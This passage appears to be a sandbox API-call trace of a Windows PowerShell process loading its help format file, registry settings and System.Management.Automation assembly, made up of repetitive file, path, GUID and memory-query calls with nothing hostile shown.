	[0054.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.682] GetLastError () returned 0x0
	[0054.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.682] GetLastError () returned 0x0
	[0054.682] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.683] GetLastError () returned 0x0
	[0054.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.683] GetLastError () returned 0x0
	[0054.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.683] GetLastError () returned 0x0
	[0054.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.683] GetLastError () returned 0x0
	[0054.683] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.683] GetLastError () returned 0x0
	[0054.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.684] GetLastError () returned 0x0
	[0054.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.684] GetLastError () returned 0x0
	[0054.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x1000, lpOverlapped=0x0) returned 1
	[0054.684] GetLastError () returned 0x0
	[0054.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0xf37, lpOverlapped=0x0) returned 1
	[0054.684] GetLastError () returned 0x0
	[0054.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x250fafb, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x250fafb*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.684] GetLastError () returned 0x0
	[0054.684] ReadFile (in: hFile=0x2fc, lpBuffer=0x2510424, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x22e294, lpOverlapped=0x0 | out: lpBuffer=0x2510424*, lpNumberOfBytesRead=0x22e294*=0x0, lpOverlapped=0x0) returned 1
	[0054.684] GetLastError () returned 0x0
	[0054.685] CloseHandle (hObject=0x2fc) returned 1
	[0054.685] GetLastError () returned 0x0
	[0054.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddf4, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0054.685] GetLastError () returned 0x0
	[0054.685] SetErrorMode (uMode=0x1) returned 0x1
	[0054.685] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2531420 | out: lpFileInformation=0x2531420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a11027b, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a11027b, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd2ed081c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1
	[0054.685] GetLastError () returned 0x0
	[0054.685] SetErrorMode (uMode=0x1) returned 0x1
	[0054.685] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0054.685] GetLastError () returned 0x0
	[0054.685] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x22e218 | out: phkResult=0x22e218*=0x2fc) returned 0x0
	[0054.685] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x0, lpcbData=0x22e25c*=0x0 | out: lpType=0x22e260*=0x1, lpData=0x0, lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.685] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x22e260, lpData=0x3c3520, lpcbData=0x22e25c*=0x56 | out: lpType=0x22e260*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x22e25c*=0x56) returned 0x0
	[0054.685] RegCloseKey (hKey=0x2fc) returned 0x0
	[0054.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22ddc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0054.686] GetLastError () returned 0x0
	[0054.686] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x22dd54, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0054.686] GetLastError () returned 0x0
	[0054.702] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0xb123c0c3, Data2=0xe48, Data3=0x47db, Data4=([0]=0xb9, [1]=0x71, [2]=0xd2, [3]=0xaf, [4]=0x29, [5]=0x16, [6]=0x32, [7]=0x8f))) returned 0x0
	[0054.703] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x4863bf08, Data2=0xd4ac, Data3=0x4ea6, Data4=([0]=0xb0, [1]=0xf1, [2]=0x81, [3]=0x8, [4]=0xc5, [5]=0xb4, [6]=0xd0, [7]=0xc5))) returned 0x0
	[0054.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.703] GetLastError () returned 0x0
	[0054.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.703] GetLastError () returned 0x0
	[0054.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.703] GetLastError () returned 0x0
	[0054.703] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.703] GetLastError () returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.751] GetLastError () returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.751] GetLastError () returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.751] GetLastError () returned 0x0
	[0054.751] CoCreateGuid (in: pguid=0x22e288 | out: pguid=0x22e288*(Data1=0x48566ff3, Data2=0x8a4a, Data3=0x4d1a, Data4=([0]=0x9e, [1]=0x9a, [2]=0x65, [3]=0x4a, [4]=0xac, [5]=0xc9, [6]=0x7, [7]=0xfa))) returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.751] GetLastError () returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.751] GetLastError () returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.751] GetLastError () returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d998, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.751] GetLastError () returned 0x0
	[0054.751] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d948, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d760, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22d710, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.752] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.752] GetLastError () returned 0x0
	[0054.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.753] GetLastError () returned 0x0
	[0054.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.753] GetLastError () returned 0x0
	[0054.753] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.753] GetLastError () returned 0x0
	[0054.754] VirtualQuery (in: lpAddress=0x22cbd4, lpBuffer=0x22dbd4, dwLength=0x1c | out: lpBuffer=0x22dbd4*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.755] VirtualQuery (in: lpAddress=0x22cc10, lpBuffer=0x22dc10, dwLength=0x1c | out: lpBuffer=0x22dc10*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22db30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.755] GetLastError () returned 0x0
	[0054.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.755] GetLastError () returned 0x0
	[0054.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22dae0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.755] GetLastError () returned 0x0
	[0054.755] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.755] GetLastError () returned 0x0
	[0054.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.756] GetLastError () returned 0x0
	[0054.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.756] GetLastError () returned 0x0
	[0054.756] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.756] GetLastError () returned 0x0
	[0054.756] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.757] GetLastError () returned 0x0
	[0054.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.757] GetLastError () returned 0x0
	[0054.757] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.757] GetLastError () returned 0x0
	[0054.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.757] GetLastError () returned 0x0
	[0054.757] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x22da40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0054.757] GetLastError () returned 0x0
	[0054.757] VirtualQuery (in: lpAddress=0x22cf40, lpBuffer=0x22df40, dwLength=0x1c | out: lpBuffer=0x22df40*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.758] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.758] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.760] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.760] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.760] VirtualQuery (in: lpAddress=0x22cf14, lpBuffer=0x22df14, dwLength=0x1c | out: lpBuffer=0x22df14*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
	[0054.760] VirtualQuery (in: lpAddress=0x22ced8, lpBuffer=0x22ded8, dwLength=0x1c | out: lpBuffer=0x22ded8*(BaseAddress=0x22c000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c
